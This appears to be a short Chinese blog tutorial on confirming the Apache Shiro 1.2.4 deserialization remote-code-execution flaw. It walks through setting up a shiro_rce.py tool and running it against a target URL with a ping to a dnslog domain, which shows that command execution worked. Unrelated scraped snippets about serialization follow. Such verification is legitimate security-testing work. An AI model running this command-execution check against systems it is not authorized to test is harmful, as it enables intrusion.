簡單的Shiro 1 2 4反序列化漏洞驗證

2021-10-03 00:10:50 字數 998 閱讀 5180

原理什麼的就不講了,直接正題

用這個工具:

建議下到windows。需要python3環境。

之後進入資料夾,開啟shiro_rce.py,增加如下幾個模組:

import os

import re

import base64

import uuid

import subprocess

import requests

from crypto.cipher import aes

其中requests和crypto是第三方庫,需要另行安裝

pip install requests
crypto這個庫比較邪門。。我用pip install直接安裝會各種報錯於是我先解除安裝掉

pip uninstall crypto

pip uninstall cipher

然後裝這個

pip install pycryptodome
需要乙個dnslog平台,我用的是

cmd下進入shiroscan的目錄

python shiro_rce.py url "ping 4v7o2m.dnslog.cn"

url就是要測試的目標位址。執行後,回來refresh下看看是否記錄了該網域名稱的dns查詢記錄,即證明目標是否存在命令執行。有,就說明存在漏洞

序列化反序列化

只要用到網路開發啊,就一定會用到序列化反序列化。1,自定義結構體 struct test int len int type char data 10 test data test buffer.缺點 明文,只支援基本型別,不支援變長結構 2,在1的基礎上,自定義乙個緩衝類,存放乙個訊息。把訊息寫入緩...

序列化反序列化

using system using system.collections.generic using system.io using system.linq using system.text using system.threading.tasks namespace 序列化反序列化 syste...

序列化和反序列化 C 序列化與反序列化。

序列化介紹 把物件用一種新的格式來表示。系列化只序列化資料。序列化不建議使用自動屬性 為什麼要序列化 將乙個複雜的物件轉換流,方便儲存與資訊交換。class program class person public int age 二進位制序列化 就是將物件變成流的過程,把物件變成byte class...